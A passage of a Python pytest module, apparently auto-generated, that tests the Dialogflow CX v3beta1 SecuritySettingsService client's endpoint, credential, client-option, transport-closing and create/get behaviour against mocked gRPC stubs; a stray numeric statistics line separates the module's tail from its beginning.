    assert SecuritySettingsServiceClient.parse_common_location_path(path) == components
def test_client_withDEFAULT_CLIENT_INFO():
    """client_info must be forwarded to _prep_wrapped_messages by client and transport."""
    client_info = gapic_v1.client_info.ClientInfo()
    with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
    with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
        transport_class = SecuritySettingsServiceClient.get_transport_class()
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials(),
            client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
    """Exiting the async client context manager must close the gRPC channel."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport="grpc_asyncio",
    )
    with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
        async with client:
            close.assert_not_called()
        close.assert_called_once()
def test_transport_close():
    """Exiting the sync client context manager must close the underlying channel."""
    # NOTE: this local dict shadows the module-level ``transports`` import for
    # the rest of the function body.
    transports = {
        "grpc": "_grpc_channel",
    }
    for transport, close_name in transports.items():
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport
        )
        with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
            with client:
                close.assert_not_called()
            close.assert_called_once()
def test_client_ctx():
    """The client context manager must delegate close() to its transport."""
    # NOTE: this local list shadows the module-level ``transports`` import for
    # the rest of the function body.
    transports = [
        'grpc',
    ]
    for transport in transports:
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport
        )
        # Test client calls underlying transport.
        with mock.patch.object(type(client.transport), "close") as close:
            close.assert_not_called()
            with client:
                pass
            close.assert_called()
| 41.890606 | 263 | 0.706317 |
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceAsyncClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import pagers
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import transports
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.dialogflowcx_v3beta1.types import security_settings
from google.cloud.dialogflowcx_v3beta1.types import security_settings as gcdc_security_settings
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2
import google.auth
# Version-gated skip markers: the ``default_scopes`` keyword only exists in
# google-auth >= 1.25.0, so scope-related tests run under exactly one of the
# two version ranges below.
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
    packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
    reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
    packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
    reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
    """Dummy mTLS client certificate source returning fixed (cert, key) bytes."""
    cert_bytes = b"cert bytes"
    key_bytes = b"key bytes"
    return cert_bytes, key_bytes
def modify_default_endpoint(client):
    """Return a sentinel endpoint if the client would hit localhost (e.g. a mTLS
    emulator), otherwise the client's own default endpoint."""
    if "localhost" in client.DEFAULT_ENDPOINT:
        return "foo.googleapis.com"
    return client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
    """_get_default_mtls_endpoint must insert ``mtls.`` only for googleapis hosts."""
    api_endpoint = "example.googleapis.com"
    api_mtls_endpoint = "example.mtls.googleapis.com"
    sandbox_endpoint = "example.sandbox.googleapis.com"
    sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
    non_googleapi = "api.example.com"
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(None) is None
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
    SecuritySettingsServiceClient,
    SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_info(client_class):
    """from_service_account_info must build a client with the factory credentials."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
        factory.return_value = creds
        info = {"valid": True}
        client = client_class.from_service_account_info(info)
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        assert client.transport._host == 'dialogflow.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
    (transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_service_account_always_use_jwt(transport_class, transport_name):
    """with_always_use_jwt_access(True) is only invoked when the flag is set."""
    with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=True)
        use_jwt.assert_called_once_with(True)
    with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=False)
        use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
    SecuritySettingsServiceClient,
    SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_file(client_class):
    """Both file-based factory methods must produce clients with the factory credentials."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
        factory.return_value = creds
        client = client_class.from_service_account_file("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        # from_service_account_json is an alias of from_service_account_file.
        client = client_class.from_service_account_json("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_client_get_transport_class():
    """get_transport_class must resolve both the default and the named transport."""
    transport = SecuritySettingsServiceClient.get_transport_class()
    available_transports = [
        transports.SecuritySettingsServiceGrpcTransport,
    ]
    assert transport in available_transports
    transport = SecuritySettingsServiceClient.get_transport_class("grpc")
    assert transport == transports.SecuritySettingsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
def test_security_settings_service_client_client_options(client_class, transport_class, transport_name):
    """Exercise ClientOptions handling: api_endpoint, mTLS env vars, quota_project_id."""
    # A ready-made transport instance bypasses transport-class resolution.
    with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials()
        )
        client = client_class(transport=transport)
        gtc.assert_not_called()
    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()
    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
    # unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
        with pytest.raises(MutualTLSChannelError):
            client = client_class()
    # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
        with pytest.raises(ValueError):
            client = client_class()
    # Check the case quota_project_id is provided
    options = client_options.ClientOptions(quota_project_id="octopus")
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id="octopus",
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "true"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "false"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_security_settings_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
    """Endpoint auto-switching to mTLS under GOOGLE_API_USE_MTLS_ENDPOINT=auto."""
    # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
    # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
    # Check the case client_cert_source is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class(client_options=options)
            if use_client_cert_env == "false":
                expected_client_cert_source = None
                expected_host = client.DEFAULT_ENDPOINT
            else:
                expected_client_cert_source = client_cert_source_callback
                expected_host = client.DEFAULT_MTLS_ENDPOINT
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=expected_host,
                scopes=None,
                client_cert_source_for_mtls=expected_client_cert_source,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case ADC client cert is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        with mock.patch.object(transport_class, '__init__') as patched:
            with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
                with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
                    # NOTE(review): ``client`` below is the instance left over from
                    # the previous with-block — relies on function-level scoping.
                    if use_client_cert_env == "false":
                        expected_host = client.DEFAULT_ENDPOINT
                        expected_client_cert_source = None
                    else:
                        expected_host = client.DEFAULT_MTLS_ENDPOINT
                        expected_client_cert_source = client_cert_source_callback
                    patched.return_value = None
                    client = client_class()
                    patched.assert_called_once_with(
                        credentials=None,
                        credentials_file=None,
                        host=expected_host,
                        scopes=None,
                        client_cert_source_for_mtls=expected_client_cert_source,
                        quota_project_id=None,
                        client_info=transports.base.DEFAULT_CLIENT_INFO,
                        always_use_jwt_access=True,
                    )
    # Check the case client_cert_source and ADC client cert are not provided.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        with mock.patch.object(transport_class, '__init__') as patched:
            with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
                patched.return_value = None
                client = client_class()
                patched.assert_called_once_with(
                    credentials=None,
                    credentials_file=None,
                    host=client.DEFAULT_ENDPOINT,
                    scopes=None,
                    client_cert_source_for_mtls=None,
                    quota_project_id=None,
                    client_info=transports.base.DEFAULT_CLIENT_INFO,
                    always_use_jwt_access=True,
                )
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_scopes(client_class, transport_class, transport_name):
    """User-supplied scopes in ClientOptions must reach the transport constructor."""
    # Check the case scopes are provided.
    options = client_options.ClientOptions(
        scopes=["1", "2"],
    )
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=["1", "2"],
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
    """Verify that a credentials file named in ClientOptions is forwarded to the transport constructor."""
    # Check the case credentials file is provided.
    options = client_options.ClientOptions(
        credentials_file="credentials.json"
    )
    # Patch the transport __init__ so no real channel is created; the test
    # only inspects the keyword arguments the client passes to it.
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
def test_security_settings_service_client_client_options_from_dict():
    """Verify that client_options given as a plain dict (api_endpoint) reaches the gRPC transport as the host."""
    with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceGrpcTransport.__init__') as grpc_transport:
        grpc_transport.return_value = None
        client = SecuritySettingsServiceClient(
            client_options={'api_endpoint': 'squid.clam.whelk'}
        )
        grpc_transport.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
def test_create_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
    """CreateSecuritySettings (sync): the stub is called once with the request and the response fields round-trip."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_create_security_settings_from_dict():
    """Re-run the sync CreateSecuritySettings test with a dict request to exercise the dict-coercion path."""
    test_create_security_settings(request_type=dict)
def test_create_security_settings_empty_call():
    """Calling with no arguments must still send a default CreateSecuritySettingsRequest."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        client.create_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_create_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
    """CreateSecuritySettings (async): the stub is awaited with the request and the response fields round-trip."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # Wrapped in FakeUnaryUnaryCall so the async client can await it.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_create_security_settings_async_from_dict():
    """Re-run the async CreateSecuritySettings test with a dict request."""
    await test_create_security_settings_async(request_type=dict)
def test_create_security_settings_field_headers():
    """The routing header x-goog-request-params must carry the request's parent field (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.CreateSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        call.return_value = gcdc_security_settings.SecuritySettings()
        client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_create_security_settings_field_headers_async():
    """The routing header x-goog-request-params must carry the request's parent field (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.CreateSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        await client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
def test_create_security_settings_flattened():
    """Flattened (keyword-arg) invocation must populate the corresponding request fields (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_security_settings(
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
def test_create_security_settings_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_security_settings(
            gcdc_security_settings.CreateSecuritySettingsRequest(),
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
@pytest.mark.asyncio
async def test_create_security_settings_flattened_async():
    """Flattened (keyword-arg) invocation must populate the corresponding request fields (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call, wrapped in
        # a FakeUnaryUnaryCall so the async client can await it.
        # (A previous redundant plain-message assignment was removed; it
        # was immediately overwritten and had no effect.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_security_settings(
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
@pytest.mark.asyncio
async def test_create_security_settings_flattened_error_async():
    """Mixing a request object with flattened fields must raise ValueError (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.create_security_settings(
            gcdc_security_settings.CreateSecuritySettingsRequest(),
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
def test_get_security_settings(transport: str = 'grpc', request_type=security_settings.GetSecuritySettingsRequest):
    """GetSecuritySettings (sync): the stub is called once with the request and the response fields round-trip."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_get_security_settings_from_dict():
    """Re-run the sync GetSecuritySettings test with a dict request to exercise the dict-coercion path."""
    test_get_security_settings(request_type=dict)
def test_get_security_settings_empty_call():
    """Calling with no arguments must still send a default GetSecuritySettingsRequest."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        client.get_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_get_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.GetSecuritySettingsRequest):
    """GetSecuritySettings (async): the stub is awaited with the request and the response fields round-trip."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # Wrapped in FakeUnaryUnaryCall so the async client can await it.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.get_security_settings(request)
